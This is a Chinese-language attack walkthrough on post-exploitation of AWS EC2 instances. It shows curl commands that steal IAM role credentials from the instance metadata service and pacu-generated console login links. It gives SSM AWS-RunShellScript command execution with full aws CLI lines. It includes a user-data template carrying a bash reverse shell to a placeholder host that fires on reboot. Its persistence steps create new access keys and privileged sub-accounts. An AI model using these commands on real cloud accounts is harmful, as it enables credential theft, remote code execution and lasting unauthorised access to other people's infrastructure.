简介
AmazonEC2-Amazon Elastic Compute Cloud云服务器是一种Web云服务,能在云中提供安全且可调整大小的计算能力
敏感信息获取
除了常规可通过github、源代码泄露、反编译应用程序、配置文件泄露序等方式收集相关AKSK凭证信息,还可以基于元数据进行信息获取
其中元数据服务是一种提供查询运行中的实例内元数据的服务,通过已经获得的实例向元数据服务发起请求是不会通过网络传输的,如进步利用已获得的实例EC2权限获取实例元数据信息
通过相关的元数据信息除了获取基本的属性外,若服务器提前配置了IAM角色,则能够进步获取相关角色的凭证信息,从而进步利用
基本IAM角色配置如下,如果没有的话直接新建下新的角色就行
data:image/s3,"s3://crabby-images/68bc7/68bc779fc2df92594c4118fc0976ed6007e42f5c" alt=""
通过各种方法,获取了当前机器权限后,进步查看所有类别的元数据如下
curl http://169.254.169.254/latest/meta-data
包含各类基本信息如下,如网络信息、主机名等
data:image/s3,"s3://crabby-images/5be86/5be86a823b9bc0016c08095864c2d0889663ba1f" alt=""
data:image/s3,"s3://crabby-images/c2897/c28974c2c84951b41f11fa6852ce571329010116" alt=""
进步角色凭证获取
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2S3
此处凭证是由提供的应用策略权限所决定,若权限较小也无法进步横向利用
data:image/s3,"s3://crabby-images/00b84/00b84d60737afb008159bc4cd4ee9b070d3e32c9" alt=""
凭证利用
网页控制台
如基于先前元数据获得的AKSK等,进步利用pacu工具,通过生成的链接进入控制台
data:image/s3,"s3://crabby-images/b2c27/b2c278a52bb7a6a75b5785e4d74efd858a960bed" alt=""
利用获得的登录地址随便开个浏览器登录控制台,进入对应区域服务器即可
data:image/s3,"s3://crabby-images/984da/984da7734e0b964525a4b0ed994757804c6b3490" alt=""
data:image/s3,"s3://crabby-images/fbd5e/fbd5e12c631ecce68473c9f8ff5df07a1e87427c" alt=""
除此之外也可从网页利用AWS Systems Manager基于runshellscript命令执行
data:image/s3,"s3://crabby-images/35fb7/35fb7c73518a6f5e3b71d303612c73a7198aedad" alt=""
data:image/s3,"s3://crabby-images/36353/36353132076ae25d01dd0d4a6b4a2eaebe339395" alt=""
运行成功如下
data:image/s3,"s3://crabby-images/34826/3482692b9ed14a947cd335fefd8dc6d7d6d6dbcd" alt=""
data:image/s3,"s3://crabby-images/4d7c8/4d7c8141a154eaa0581084acee48d6398db990e4" alt=""
除此之外获取网页控制台后可查看子网信息,为进步横向移动进行信息收集
data:image/s3,"s3://crabby-images/bcec0/bcec0bf1e01062866ed02f468335e5a1be4c3aeb" alt=""
除pacu外其他工具也可以同理生成链接进入控制台
data:image/s3,"s3://crabby-images/8fa62/8fa626a2d62ef612e5818c14b29e18f773734d57" alt=""
data:image/s3,"s3://crabby-images/f4ce8/f4ce847378b10e7b8ef5f4fffcb9c0db16dc0b92" alt=""
在机器可重启的情况下可利用用户数据进步执行命令,此处编辑数据是需要停止用户实例的,且停止实例后ip会变动!!!
data:image/s3,"s3://crabby-images/561f3/561f390f44634cc327c4b2c8c379a91546a1cc2e" alt=""
data:image/s3,"s3://crabby-images/564ae/564ae6b8831ffaafd2e4e333ed7db827bb1908b3" alt=""
官方提供的文件模板直接写反弹shell如下
Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0
--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"
# cloud-config
cloud_final_modules:
- [scripts-user, always]
--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"
# !/bin/bash
bash -c 'exec bash -i &>/dev/tcp/XXXXX/XXX <&1'
--//--
data:image/s3,"s3://crabby-images/34ca1/34ca1ba328ff61a0c4f9b095169b843890069425" alt=""
或者不用文件格式,直接创建文件也可
data:image/s3,"s3://crabby-images/9e80f/9e80f9c638fb8899d6e8d519893e6679396212a6" alt=""
基于先前提及的元数据也可以获取用户数据信息如下
data:image/s3,"s3://crabby-images/7e6cf/7e6cf6e67d5ce972650ade112f65ed08beb400fa" alt=""
客户端
获取要执行的实例服务器id
aws ec2 describe-instances --output text
data:image/s3,"s3://crabby-images/14fec/14fec307d485ff73f5232d06a68cacfedb6eb4a1" alt=""
过滤出可用区、当前状态、对应的实例id
aws ec2 describe-instances --query 'Reservations[*].Instances[*].[Placement.AvailabilityZone, State.Name, InstanceId]' --output text
data:image/s3,"s3://crabby-images/3ca84/3ca84c2e76958d2df4e2fd0217d50ffcd0ff84f8" alt=""
aws ssm send-command --document-name "AWS-RunShellScript" --document-version "1" --targets '[{"Key":"InstanceIds","Values":["i-123456"]}]' --parameters '{"workingDirectory":[""],"executionTimeout":["3600"],"commands":["ifconfig"]}' --output text
需要记录好命令id
data:image/s3,"s3://crabby-images/73947/739475aa869215d9879ec5567e044f4dc57ea7a8" alt=""
aws ssm list-command-invocations --command-id 123456 --details --output text
data:image/s3,"s3://crabby-images/c4615/c4615372657c864811c0be7e964383483d5594d2" alt=""
data:image/s3,"s3://crabby-images/f0710/f07105a806cd22863e27c5b0fd1a1ced6fe72ba7" alt=""
权限维持
除了先前的用户数据,基于写入反弹shell,从而当用户机器重启的时候可以进而弹回权限,但可能很多机器不会随意重启,普适性较低
还可通过网页创建新的密钥,后续利用该高权限AKSK进步开展渗透工作
data:image/s3,"s3://crabby-images/effe7/effe736e8a51dcffefac959b6c0a23420aaec469" alt=""
data:image/s3,"s3://crabby-images/812e7/812e76d3209b0d4d529089bff5aa88570b8ec6ed" alt=""
当权限足够的情况下也可利用子账户创建高权限账户,后续直接利用子账户即可
data:image/s3,"s3://crabby-images/13127/131276b5c7017b92d8b259b2b29647e3e0f8818c" alt=""